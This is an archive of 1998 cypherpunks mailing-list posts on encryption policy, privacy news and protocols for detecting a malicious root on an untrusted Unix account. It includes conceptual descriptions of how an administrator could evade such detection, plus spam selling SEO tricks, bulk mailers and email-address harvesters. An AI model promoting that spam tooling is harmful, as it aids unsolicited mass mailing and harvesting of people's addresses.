MIME-Version: 1.0
Content-Type: text/plain


In doing a search on the "RELIGIOUS FREEDOM AMENDMENT", Lycos popped over 2000 hits.  In checking out several sites, this one seemed the most rational in discussing the issue.

http://www.religioustolerance.org/const_am.htm









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andrew fabbro <afabbro@umich.edu>
Date: Thu, 5 Mar 1998 17:39:15 -0800 (PST)
To: Ken Williams <jkwilli2@unity.ncsu.edu>
Subject: Login Tripwire Protocols
In-Reply-To: <Pine.SOL.3.96.980305125302.21425A-100000@c00069-100lez.eos.ncsu.edu>
Message-ID: <Pine.LNX.3.95.980305203357.899A-100000@brokenarrow.us.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I have more of a general privacy rather than a crypto question.  I am>
> trying to set up "tripwires" in the various computer accounts that i have>
> so i will know if a superuser or sysadmin has accessed them.  (it should

Can you build a reliable login tripwire on a machine where you don't
have root access and root is likely a malicious character?  The answer
is...maybe!  It requires a fairly sophisticated protocol and a lot of
work...here are three of my ideas that didn't pan out, one that probably
would, and a lot of caveats.  I'd appreciate comments, criticism,
etc. from other 'punks.

THE GOAL

You have an account on a system on which you do not trust root, or on
which you think someone else may be able to log in as you.  You want
to build an automated system which alerts you when someone logs in as
other than yourself.

(n.b.: we're just talking about a login tripwire.  Root doesn't need to
log in as you to read your mail or copy your files).

THE PROBLEM 

The basic problem here is that you can't trust anything on the
insecure system.  Root can modify any file, any binary, your shell, your
environment, the kernel, a program running in memory, logs, devices, etc.
You want to get secure information out of an environment in which all
incoming and outgoing communications can be tampered with at will.

It's sort of like standing in front of a locked door to a speakeasy and
wanting to know if your friend Ivan is inside.  You can slide a paper
through the slat and if Ivan is in inside, require that he prove himself
by signing the paper.  However, if the paper comes back blank and the
bouncer says "he ain't here," how do you know that Ivan isn't tied up
in the back room?

I've thought of some protocols which root could defeat only if he had an
above-average degree of technical sophistication...e.g., examing a running
kernel and modifying it, disassembling binaries, etc.  These are not
normal admin tasks.  However, trusting your adversary to be ill-educated
is poor security practice.  There is one good protocol I thought of,
which would work except for the the #1 problem common to any attempt of
this sort...

THE ACHILLES HEEL

...and the #1 problem is: how do you determine if you (or someone posing
as you) is logged on to the remote machine?  Suppose the bouncer is
honest.  What if your adversaries can make Ivan invisible?  Anything your
account initiates via a .login script or similar can easily be avoided
by root, who can modify these scripts before logging in and restoring
them when done.  This leaves you with some sort of automated checking
to see if you're on, and a system to alert you if you are.

The common ways of determining who's logged on to a system can fail or be
circumvented:

	(a) utmp - notoriously easy to circumvent (utmp provides the info
	for who, finger, etc.)  Sometimes an errant shell will circumvent 
	this accidentally, to say nothing of a concerted effort.  Root can
	modify this trivially.

	(b) ps to look for owned processes -- root can easily write a ps
	program that works normally except for devious reporting when
	he's masquerading as you.  Even if you use a custom program
	(which you have to either import each time or hash-check),
	root can modify the kernel, your environment, etc.

	(c) you can see who owns /dev terminals, but again...

	(d) I'm not sure if there is some method of consulting the kernel.
	Modifying a running kernel is considerably more difficult than
	the above, but if there is a means of consulting the kernel to
	see who's on, root could certainly circumvent it.

You could make SHA message digests of the relavent system binaries and
include checks for them in your robot messanger, but root may already
have changed them.  And remember that root can control your shell,
your environment, etc.

Maybe you assume that your adversary could not do these things.  I don't
think there is no 100% reliable way to see authoritatively who's logged
on to a system, even if your adversary is not a wizard.  However, for
the sake of discussion, let's assume for the moment that you find some
method of determining who's logged in that you feel confidant with,
either because your adversary lacks the technical ability to circumvent
normal methods, or because they are one person secretly being naughty
in an otherwise professional team that would notice changes, or because
your own wizardry outstrips there's.

The next trick is to build a robot to either sit inside the speakeasy to
shout out to you if Ivan is there, or one that goes into the speakeasy,
looks around, and reports back to you.  The trick is making sure that
the robot's voice is not impersonated by your enemies or that it is not
rewired before being sent back to you.

THINGS THAT WON'T WORK

Any kind of notification system that is initiated by your login scripts.

Anything that requires querying the insecure machine from a remote
machine to ask if you're logged on.  Root controls all inbound and
outbound communication.

Any sort of cron job run on the insecure machine -- root can turn these
off, insert a spoofer, do his deeds, and then restore things, with you
being none the wiser.

These protocols all assume you have an account on a trusted machine
that you feel is secure (you fool!), at least from the admin on the
insecure machine.

PROTOCOL #1 - DAEMON

You set up a daemon on the insecure machine which once a minute sees
who's on, and if you're on, sends that information along with a SHA
message digest (hash) of itself and its process number to the remote
machine, who checks to see if the process number or hash has changed,
and then builds a log.  You can then check this log to see if anyone
was on when you don't remember being on.

Problems:

(*) root can monitor outbound mail.  When he sees a message going to
your secure machine, he simply replaces it.

(*) root can grab the daemon's code out of memory, rewrite it so that it
first asks root if it should say you're on, and then proceeds normally,
sending out the same process number and SHA MD as an unmodified daemon
would.  He can even write a daemon that monitors for your daemon,
correcting its output whenever you restart your daemon.

PROTOCOL #2 - DAEMON IMPROVED

Same as #1, but this time the daemon first asks for a public key
from your secure host, and then encrypts its response using that key.
This defeats the first attack above.

Problems:

(*) root can use a classic man-in-the-middle attack to harvest the key
on inbound mail and then encrypt it for outbound mail.  No improvement.

PROTOCOL #3 - PROCMAIL + BINARY ROBOT

The trusted machine contains a set of object files in a linkable state
(i.e., post-compile, pre-link) for a binary robot which (a) checks to
see if you are logged on to whatever machine the robot is running on,
(b) encrypts this information using a public key, and (c) returns the
encrypted "yes/no" to the trusted machine, as well as a SHA message
digest of itself.

You set the following up as a cron job to run every X minutes on the
trusted machine.  The longer the gap, the longer an intruder might be
able to play around unnoticed.  However, the shorter the gap, the higher
the load, and you have to make sure the insecure machine can finish it's
processing within the gap.  Perhaps X should be semi-random.

(a) the trusted machine generates a public/private key pair.  The public
key is placed in a linkable format and linked with the object files for
the binary robot.  The trusted machine notes the outbound binary's SHA
message digest.

(b) the trusted machine mails this binary robot to the insecure machine.
At the insecure machine, you have a .procmailrc which looks for the
robot and  runs it

(c) the robot checks to see if you're online, and encrypts a reply
using the public key that's stored within it.  It sends this back to
the trusted machine.

(d) the trusted machine decrypts the message.  Because each key is
different, one-time, and used sequentially, there should be no replay
attack possibility here.  The trusted machine checks the SHA MD, and
if it's different, goes into alert mode -- sending you e-mail, paging
you, whatever.  Otherwise it just continues to build its log that you
can examine later.  You could do more processing -- perhaps you only
turn on this system on the trusted machine when you're not logged into
the insecure machine.  If it detects you are on while it's running,
it goes into alert mode.

(e) lather, rinse, repeat.  

Problems:

(*) impracticalities of system load, and possible processing time length,
as noted above

(*) Root could sabotage procmail so instead of spawning your robot, it
spawns one of root's.  This mischevious binary then digs out the public
key from your robot's binary code, and returns a message with a "no,
he's not on" message and an SHA message digest of your binary.  (He could
also delete your .procmailrc or otherwise stop your automated system, but
this would be obvious and suspicious).  Since he'll have your binary and
your public key, there is no way to prevent this man-in-the-middle attack.

PROTOCOL #4 - PROCMAIL + BINARY, IMPROVED

Same as #3, but when the trusted machine links your little binary robot,
it randomly selects one of many random object files which contain
some trivial operation for the robot to perform.  The results of this
operation are then appended to the robot's reply.  Examples of these
random operations:

	-- print out the date in format X
	-- print "CNN Anchorwoman Lynn Russell is a goddess"
	-- lookup root's shell and `ls -l` it into the message
	-- print out the first 15 prime numbers into the message
	-- multiply pi by 9.856497 and print out the result
	-- figure the SHA hash of /bin/sh and print it

etc.  If this robot is intercepted, it will be difficult for root's robot
to mimic its behavior.  Yes, root could manually disassemble it and figure 
out what it's secret operation is and build his own binary to mimic it, but 
not in the minute or two that the binary will run before the next robot
each time would likely not work, because the compiler might link them all at
the same place and root's malicious binary could examine the binary and
ferret out the string automatically.

The random operations do not have to be complex, but they must have these
qualities:

	(*) the result must be definitively known to the trusted system
	(e.g., something like "finger root to see when he last logged
	in" will not work.  But "figure 9 to the 7th power and print
	the result" would)

	(*) the operation must be reasonably fast -- you don't want the
	robot doing a long calculation, which might let root analyze
	the robot, kill it, perform the calculation himself (perhaps
	on a faster machine), and spoof the reply.  Diversity is more
	important than complexity

	(*) there must be a large pool of these operations to choose from

	(*) the choosing must be random.  Obviously, it will
	be pseudorandom, but a strong pseudorandom system with
	least-significant time seeds should be sufficient, unless the
	insecure machine's root in this case is root@nsa.gov.

Problems:

(*) again, impracticalities of system load, and possible processing time
length, as noted above

(*) root will be able to save and analyze the robot binaries.  If the
pool is not diverse enough, root might be able to determine the likely
next message and spoof the reply.  This will not be detectable from
the trusted machine's perspective.  However, the trusted machine might
(a) have a large pool of random operations to choose from to make this
impractical, or (b) simply have a subroutine which randomly generates
random operations from a pool of pieces -- e.g., a set of rules from which
it randomly picks, and then performs other random operations to generate
the actual operation.  (i.e., rule #85 says pick three floating-point
numbers and generate an operation wherein the robot has to figure out
the cosine of each).  This would be much more difficult to predict/spoof.

CONCLUSIONS

First and foremost, the difficult of accurately determining who's on
will likely undermine any attempt to set up a login tripwire.

Also, we're talking about a login tripwire.  Suppose I'm root and I
want to copy a file from your home directory called diary-of-my-sexlife.
All I have to do is note the access/modify/change times, copy the file,
and then restore these times with touch(1).  You can't detect or prevent
read-only access.

Going to all the work of implementing protocol #4, the most reliable of
these, would likely result in a reasonably secure way of determing if
you're logged in (again, with the difficulty of determining who's logged
on caveats), but is it worth all this effort?  I was just thinking these
things up because I was bored.  If I really had an account on a system
I didn't trust, I would cancel it.



-- 
 Andrew Fabbro   [afabbro@umich.edu]   [andrewf@jesuswept.com]
 http://www-personal.umich.edu/~afabbro/          313.647.2713 
 "We make money the old fashion way. We print it." - DigiCrime





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 5 Mar 1998 17:40:05 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Gun Grabbers in WASHINGTON -- Friday
Message-ID: <1.5.4.32.19980306014415.0102aa64@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
>
>8 a.m.-Noon. POWDER TAGGANTS - Conclusion of a two-day conference by a
>National Resarch Council committee examining the technical viability of
>and issues related to tagging black and smokeless powders.
>	Location: National Academy of Sciences, 2100 C St. NW.
>	Contact: 202-334-2138.


The New York Times reported today that the National Research
Council found that it was not feasible to require taggants in
explosives and recommended that the technology not be pursued.
Instead, it proposed improved licensing and protection of storage.

The panel noted that it would be very difficult to restrict access to
common materials for manufacturing explosives, and that law
enforcement should improve investigation, intelligence and
education of the public.

An unconfirmed Reuters is that the panelists fist-fought tooth-and-nail
gouch&suck-eyeballs over the issue of a confidential investigation to 
determine why there were no ATF agents in Murrah, only the 
head-hammered remains of all the agency's Wintel boxes choked 
with endless incoming of "The Availability of Bombmaking Information 
on the Internet" auto-forwarded from Senator_Feinstein@remailer.to.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: poc@search-engine-help.com
Date: Thu, 5 Mar 1998 22:26:07 -0800 (PST)
To: webmasters@cygnus.com
Subject: Your Web Site's Findability
Message-ID: <199803060625.WAA20788@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain





Would you like to improve your website's "find-ability" in
the Search Engines?

During the past two years, my company has been placing
hundreds of webpages into the Top Ten -- the front page --
of the major search engines... and, for about $8 a month, I
will show you how we do it... and I'll share with you our
ongoing research -- every month!

My name is Stephen Mahaney. I am the president of Planet
Ocean Communications. My web marketing company has literally
"written the book" on how to position your website on the
front page -- the Top Ten -- of each of the major search
engines... guaranteed!

Our 65 page manual identifies every trick & technique that
is being used on the Internet to gain an almost "unfair"
advantage in landing websites at the top of the search
engine lists -- right where you need to be so that potential
customers who are seeking your services or products can find
you.

Our monthly Newsletter keeps you abreast of the latest
techniques and frequent changes that take place in the
dynamic world of "search engine" science.

However, understanding the process does not require a degree
in "rocket" science -- nor do you need to be "technically
oriented". Whether your website is a "do-it-yourself"
project or you are paying someone to maintain your site, you
(or your webmaster) need to know the tricks in this book in
order to compete with the professionals who are dominating
the front pages of the various search categories.

To learn more about how you can obtain this essential
information and receive a free subscription to our
Newsletter -- SEARCH ENGINE SECRETS UPDATE, go to....

  http://www.search-engine-help.com/advantage/

You'll be glad you did.


Sincerely, 
Stephen Mahaney - President 
Planet Ocean Communications



***************************************************
Note: We have contacted you based on information that we
gathered while visiting your website - If you would prefer
not to receive mail from us in the future, simply reply with
the word "remove" in the subject line and you will be
automatically excluded from future correspondence. Thanks
***************************************************


Thought for the day... 
"The only thing a man can take
beyond this lifetime is his ethics" 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. Alan Sherman" <sherman@cs.umbc.edu>
Date: Fri, 6 Mar 1998 03:11:48 -0800 (PST)
To: Crypto Announce -- Crypto UMBC <theory-local@cs.umd.edu>
Subject: Barry Smith (FBI) speaks today 3:30pm at UMBC
Message-ID: <Pine.SOL.3.95.980306060957.17174B-100000@topdog.cs.umbc.edu>
MIME-Version: 1.0
Content-Type: text/plain


   The UMBC Security Technology Research Group presents

     A Law-Enforcement Perspective on Encryption Policy

			Barry Smith
	       Supervisory Special Agent, FBI

	    moderated by journalist Peter Wayner

		      3:30pm - 5:00pm
		   Friday, March 6, 1998
		      Lecture Hall III
	       University of Maryland, Baltimore County
    http://www.cs.umbc.edu/events/spring98/crypto.shtml

The second lecture and discussion in a two-part forum on
encryption policy.  Journalist Peter Wayner will introduce
and moderate the event, which is free and open to the
public.  In Part I, freedom activist John Gilmore and Fritz
Fielding (Ex-Associate General Councel, NSA) gave their
divergent views, focusing on the Burnstein case.

Barry Smith will articulate the needs of law enforcement to
conduct lawful wiretaps; he will advocate the use of
key-recovery techniques to achieve this end as a way that
provides adequate privacy to law-abiding citizens.

Schedule: The event will begin with a brief (10 minute)
introduction by Peter Wayner.  Following Barry Smith's talk,
which will last approximately 45 minutes, there will be an
opportunity to ask questions for approximately 20-30
minutes.

Questions: Attendees are encouraged to ask questions in
advance by sending email to sherman@cs.umbc.edu

Directions: Take Exit #47B off interstate I-95 and follow
signs to UMBC.  LH III is in the Administration Building,
adjacent visitor's parking lot near the I-95 entrance to
UMBC.  

Host: Dr. Alan T. Sherman
      Associate Professor, Computer Science
      sherman@cs.umbc.edu
      http://www.umbc.edu
      (410) 455-2666

     This event is held in cooperation with the UMBC
	       Intellectual Sports Council
		       Honors College
	       Phi Beta Kappa honors society
                   CMSC Council of Majors
		   IFSM Council of Majors
		ACM Student Chapter at UMCP






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ? the Platypus {aka David Formosa} <n9505834@garbo.nepean.uws.edu.au>
Date: Thu, 5 Mar 1998 11:48:20 -0800 (PST)
To: David Honig <honig@otc.net>
Subject: Re: Feds bust Inet gambling
In-Reply-To: <3.0.5.32.19980305111814.007a9b20@otc.net>
Message-ID: <Pine.OSF.3.96.980306064313.31448B-100000@oberon>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Mar 1998, David Honig wrote:

[...]

> U.S. authorities launch Internet gambling crackdown
> 
> NEW YORK (Reuters) - U.S. federal authorities charged 14 people on
> Wednesday with running gambling sites on the Internet in violation of
> federal laws. 

I wonder if thay are going to go after http://www.tab.com.au/ ?
I personaly find these anty-betting laws difficalt to understand.

Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. 
Support NoCeM http://www.cm.org/                   
I'm sorry but I just don't consider 'because its yucky' a convincing argument





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 6 Mar 1998 09:48:28 -0800 (PST)
To: andrew fabbro <jkwilli2@unity.ncsu.edu>
Subject: Re: Login Tripwire Protocols
In-Reply-To: <Pine.SOL.3.96.980305125302.21425A-100000@c00069-100lez.eos.ncsu.edu>
Message-ID: <3.0.5.32.19980306093852.007b3200@otc.net>
MIME-Version: 1.0
Content-Type: text/plain


At 08:38 PM 3/5/98 -0500, andrew fabbro wrote:
>Can you build a reliable login tripwire on a machine where you don't
>have root access and root is likely a malicious character?  The answer
>is...maybe!  It requires a fairly sophisticated protocol and a lot of
>work...here are three of my ideas that didn't pan out, one that probably
>would, and a lot of caveats.  I'd appreciate comments, criticism,
>etc. from other 'punks.

Look up Ross Anderson et al's paper, Programming Satan's Computer, in
which a similarly omnipotent and malicious programming environment is 
discussed.


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"But if we have to use force, 
it is because we are America;
we are the indispensable nation."
---Secretary of State Madeleine K. Albright
http://www.jya.com/see-far.htm







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Mar 1998 06:50:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: BXA 97 Report on Encryption
Message-ID: <1.5.4.32.19980306145512.0105b03c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


BXA issued its 1997 Annual Report on March 4. We've
excerpted the sections on encryption, which summarize
the administration's policy, goals and accomplisments:

   http://jya.com/bxa97-encry.htm  (43K)

Sample:

In the nine month period from the transfer of commercial 
encryption items to Commerce through the end of FY 1997, 
BXA has received over 1,000 encryption license applications
valued at more than $500,000,000. Forty companies have 
submitted commitment plans which lay out how they will build 
and market key recovery products. These companies include
some of the largest software and hardware manufacturers in 
the country. BXA has approved 32 of these plans; none have
been rejected. Furthermore, eight companies have submitted 
requests for a one-time review of key recovery encryption items 
which will facilitate the establishment of a key management 
infrastructure (KMI). Four of these products have been approved
for eligibility under License Exception KMI. BXA has also 
approved four U.S. entities to serve as their own Key Recovery 
agents for these products (i.e. corporate "self-escrow").





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 6 Mar 1998 10:32:47 -0800 (PST)
To: cypherpunks@toad.com
Subject: UPS to market DIGITAL SIGNATURE AUTHENTICATED DIGITAL DOCUMENT DELIVERY, $5 < $x < $10
Message-ID: <3.0.5.32.19980306103212.007aedd0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



http://dailynews.yahoo.com/headlines/technology/wired/story.html?s=n/reuters
/980306/wired/stories/ups_2.html

UPS ships high-tech security along with packages

By Randolph Court 

SAN FRANCISCO (Wired) - United Parcel Service stepped into the
secure-electronic-data-transmission business this week, promising to make
online-document delivery as trustworthy and easy to use as a dollar bill
minted by the US Treasury. 

"We view ourselves as a trusted third party," said Mark Rhoney, vice
president of marketing for electronic commerce at UPS. 

But can UPS shift its focus from shipping cartons into computer bits? Its
move marks a head-on assault at a growing business now handled by much
smaller, specialized high-tech companies. What UPS will offer by the second
quarter of 1998 is an alternative to existing systems offered by lesser
known entities like Entrust Technologies and Network Associates' PGP
division. 

Entrust and PGP hawk encryption systems that allow one person to send a
secure data file to someone else with no meddling from any outsiders. 

UPS's new service, developed in partnerships with Tumbleweed Software and
NetDox, is based on the idea that a supervisor should be involved in the
process to guarantee the integrity of the information being sent. 

Say a lawyer wants to send a contract worth $3 million, but the recipient
decides to tinker with the numbers and knock the figure down to $2.5
million. The situation dissolves to finger pointing, each side saying they
agreed to something different. 

With the UPS system, the data that is sent will be digitally fingerprinted
and archived with time stamps and receipts from each party, so there will
be records of whether or not a document has been tampered with. 

"The document is digitally notarized and legally binding," said NetDox
spokesman Lee Kallman. If there is a finger-pointing situation, UPS will be
able to prove in court exactly what was sent, by whom, who received it, and
when. 

"That's what you don't get with other encryption systems, and that's the
void UPS wants to fill," said Kallman. The service will play a role not
unlike the role a government plays when it guarantees the value of
currency, Kallman said. 

UPS will insure the integrity of each document, and the identity of both
sender and receiver, for up to $100,000. 

The system is called UPS Document Exchange, and it will offer two levels of
security - Dossier for the strong stuff and Courier for the milder version. 

For the most sensitive data, UPS will use a system designed by NetDox that
requires users to download a software client that wraps data - any sort of
digital information, from simple documents to multimedia - in two layers of
encryption, an inner 40-bit layer, and an outer 128-bit layer. 

The data is sent to a UPS server where it is unwrapped, and a digital
fingerprint is taken and stored; then it is re-wrapped and sent to its
destination, where the recipient opens it with the NetDox client software. 

For less-critical data packages, UPS will use a system designed by
Tumbleweed that encrypts data with a varying number of bits to accommodate
the different encryption levels supported by browsers in different countries. 

The encrypted data is then sent to a UPS server, where it is stored at a
128-bit encryption level. The server sends an email message to the
recipient telling him or her the Web address where the data resides and how
it can be accessed via browser with RSA encryption. 

--- 

UPS has been close-mouthed on the question of price, saying only that
delivery will be more expensive than a 32-cent stamp and cheaper than a
traditional overnight delivery. 

NetDox has been charging $5.35 for domestic transactions and $10.70 for
international data exchanges, according to Kallman. But it hasn't had much
competition. If the UPS service proves viable and other competitors emerge,
prices could drop precipitously, Kallman said. 

News of the UPS service was greeted warmly in some corners of the
encryption industry, and skeptically in others. 

"We're very excited to hear that a large company like UPS is rolling out a
broad-based service like this," said Gina Klein Jorasch, director of
enterprise marketing at VeriSign. The company provides digital
certificates, which act like identity cards tying a user's identity to a
public key that enables the encryption process. 

--- 

VeriSign has reason to be hopeful, though. Software clients like the ones
provided by NetDox and Tumbleweed require digital certificates, just like
those provided by VeriSign. 

"A deal between VeriSign and UPS is very conceivable," Jorasch said. 

Jeff Harell, the product manager for PGP products at computer security
giant Network Associates, quarreled with the fundamental idea of involving
outsiders in the data transmission process. 

"Why would a corporate customer want to go to third-party systems?" Harell
asked. "A lot of companies don't want to involve a third party that they
are required to trust." Many companies view their data as too important to
risk exposing to a system with so many junctions and exchange points. 

PGP is a proprietary system. Users sending and receiving data must both
have PGP, and their keys can only be provided and verified by PGP. 

All of this is new in the traditional package delivery industry, but not
unexpected. 

"Now that the Web has become so ubiquitous, this strikes me as something
that UPS and the other delivery companies needed to do," said Rita Knox, an
industry analyst with the Gartner Group. 

"This is a pretty compelling service," Knox added. "It's available 24/7 and
it's virtually instantaneous." 

Federal Express, after a failed attempt to introduce an electronic service
in the early 1980s, ended up setting a standard in the industry in 1995
when it launched a self-service ordering and tracking system on the Web. 

Similar services have since been adopted by UPS and Airborne Express, among
other competitors. Analysts are looking ahead to the possibility of UPS's
online delivery service becoming an industry must-have if it proves
successful. 

"I definitely anticipate another domino effect if UPS has any success with
this at all," said Michael Sullivan-Trainer of International Data Corp.
"All it takes is one competitor to introduce a new software innovation and
it changes industry dynamics." 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

"But if we have to use force, 
it is because we are America;
we are the indispensable nation."
---Secretary of State Madeleine K. Albright
http://www.jya.com/see-far.htm







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 6 Mar 1998 12:16:25 -0800 (PST)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <3.0.5.32.19980306121618.007b7a10@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



Politicians still think they're relevant...

Given that this bill passed 414-1, it'll likely be US law soon.

Does this mean that law enforcement will now need a judicial wiretap order
to go scanning for evidence to get a warrant?






http://dailynews.yahoo.com/headlines/technology/story.html?s=n/reuters/98030
6/tech/stories/privacy_1.html
 Friday March 6 10:33 AM EST 

 House Passes Wireless Privacy Bill

 WASHINGTON (Reuters) - In a bid to protect privacy for cellphone or
digital calls, the House Thursday voted
 414-1 to make intercepting such phone conversations illegal. 

 The Wireless Privacy Enhancement Act makes clear that the act of
interception -- whether or not the call is later
 divulged or disseminated in any way -- is against the law. 

 It bans modification of scanners that are now on the market that can
easily pick up calls made on cell phones, and
 prevents a market for new scanners capable of intercepting digital
communications. 

 The bill, which the Senate has not yet acted on, increases penalties for
intercepting or divulging private
 communications, making them subject to a $2,000 fine and six months in
jail. Earlier laws had not treated such
 interceptions as serious offenses if they were not used for financial gain. 

 Although the bill had broad bipartisan support, it was a particular
favorite of Republicans, who were furious after a
 December 1996 cellphone conversation involving House Speaker Newt Gingrich
and fellow Republican leaders
 was taped by a Florida couple. House Republicans have alleged that
Washington Democratic Rep. Jim
 McDermott then leaked it. 

 McDermott -- who voted for the wireless privacy act -- has not publicly
commented on those allegations. 

 Ohio Republican Rep. John Boehner, who was using a cellphone in his wife's
car in that conversation with
 Gingrich, enthusiastically backed the bill. "Our message should be plain
and simple," he said. "If you violate
 someone's privacy, you are not creating idle mischief, you are breaking
the law and of the land and you will be
 brought to justice." 

 Roughly 50 million Americans use some kind of new mobile electronic
communications services, according to the
 bill's sponsors. 

 The sole vote against the bill came from Ron Paul, a Texas Republican. He
was not immediately available for
 comment. 
------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

If you start now, the year 2038 problem might be tractable.







	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sat, 7 Mar 1998 03:19:11 -0800 (PST)
To: Ken Williams <cypherpunks@toad.com
Subject: Re: tripwires when you're not superuser.
In-Reply-To: <Pine.SOL.3.96.980305125302.21425A-100000@c00069-100lez.eos.ncsu.edu>
Message-ID: <3.0.5.32.19980306181151.0089ba10@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:11 PM 3/5/98 -0500, Ken Williams wrote:
>trying to set up "tripwires" in the various computer accounts that i have
>so i will know if a superuser or sysadmin has accessed them.  

In the general case, you can't do it, though there may be
special environments which let you do this but still let you
do useful work.

If somebody else controls the RAM, file systems, and communications
on a computer, and you don't, you have no way to tell what they've done.
For instance, anybody who can read raw blocks off the disk can
read your files without triggering any mechanisms you control.
Anybody who can read incoming packets off the LAN and WAN
can read your email before putting it in your mailbox.
If you convince people to encrypt mail before sending it to you,
and you encrypt any data you store on the system's disk blocks, 
using programs that aren't running on that computer,
reading your stuff may not be very interesting to the sysadm.
But if you run the decryption program on the system,
and the sysadm can read your keystrokes (either from a keyboard
or tty driver or telnet daemon), you're still naked.

There's been some theoretical work done into computing entirely
with encrypted data, and for a few specific mathematical problems
it's probably possible to get useful work done by an untrusted processor,
but usually the computations required for blinding and unblinding
are more work that the untrusted processor did for you anyway.

Short of that, the closest you'll find are secure operating systems
rated at Orange Book B2 or above (B3 and A, if any), which don't
have one all-powerful superuser.  In those systems, if the person
who has access to the raw disk (either physically or by asking the OS)
doesn't cheat, you have some guarantees about security, and in particular
you have some guarantees that nobody _but_ the semi-super-users
can crack the system in ways that give them access to your bits.
Unless all writes to the disk drive are encrypted, anybody who's got
unsupervised physical access to the disk is a semi-super-user, 
because they can steal the disk and plug it into their own machine,
where they're as super a user as they want to be.

If you're concerned about the machine being physically compromised,
you could set up an application that's always sending keepalives
across the net to your off-site monitoring location, but that's
pretty annoying, leads to lots of false alarms, may still be crackable
(though cracking may interrupt the system briefly, which is the win),
and is overall not very practical.  But it might let you know
that the disk drive has been stolen.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 96866514@mci.net
Date: Fri, 6 Mar 1998 21:37:49 -0800 (PST)
To: Members@aol.com
Subject: Expose your Website or Business To Millions With Stealth !!!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#ffffff">
</P><P ALIGN=CENTER><FONT  COLOR="#00ffff" SIZE=6><B>Bulk Email Programs<FONT  COLOR="#00ffff" SIZE=5>
</FONT><FONT  COLOR="#ff0000" SIZE=4>6 Major Programs On ONE CD ONLY $600.00 !!!!!!!

</FONT><FONT  COLOR="#0000ff" SIZE=4>All these programs together will cost of over $1600.00 at retail price and are available until 02/28/98 for this price.</FONT><FONT  COLOR="#ff0000" SIZE=4>
</P><P ALIGN=LEFT>
Please keep in mind that none of these programs are demos they are full version programs.
</P><P ALIGN=CENTER>
</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=4>STEALTH MASS MAILER (FULL VERSION)
</FONT><FONT  COLOR="#8080ff" SIZE=3>SEND BULK EMAIL AT THE RATE OF 200,000/HOUR ( Retail $399.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

TURBO EMAIL LIST MANAGER
</FONT><FONT  COLOR="#8080ff" SIZE=3>POWERFUL EMAIL DATABASE LIST MANAGER  (Retail 299.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

HURRICANE EMAIL ADDRESS COLLECTOR
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM WEB SITES (Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>

GEO SNAKE
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES BASED ON CITY/STATE
(Retail $199.00)</FONT><FONT  COLOR="#00ffff" SIZE=4>

NEWS SLEUTH
</FONT><FONT  COLOR="#8080ff" SIZE=3>COLLECTS TARGETED EMAIL ADDRESSES FROM NEWSGROUP POSTS 
(Retail $295.00 )</FONT><FONT  COLOR="#00ffff" SIZE=4>


EMAIL PRO
</FONT><FONT  COLOR="#8080ff" SIZE=3>EMAIL ADDRESS LIST MANAGER ( Retail $195.00 )

</P><P ALIGN=CENTER></FONT><FONT  COLOR="#ff0000" SIZE=3>YOU GET ALL 6 PROGRAMS ON CD FOR ONLY $600

</P><P ALIGN=LEFT></FONT><FONT  COLOR="#00ffff" SIZE=3>TO ORDER PLEASE CALL (213)757-9032 FOR COMPLETE ORDERING DETAILS.</FONT><FONT  COLOR="#000000" SIZE=3></B>epartment at (213) 757-9032 <B>For orders for next day delivery please add $15.00 to your order and priority mail please add $3.00 to your order.</B>

<FONT  COLOR="#ffff00" SIZE=3>I<FONT  COLOR="#ffff00" SIZE=4>f you are interested in becomming a vendor for our software please email us at Infosupport@juno.com for complete details.</FONT><FONT  COLOR="#000000" SIZE=3>


 Remove Here 



<FONT  COLOR="#0f0f0f" BACK="#fffffe" SIZE=3><B>
----------------------- Headers --------------------------------
Return-Path: <bob@multi38.netcomi.com>
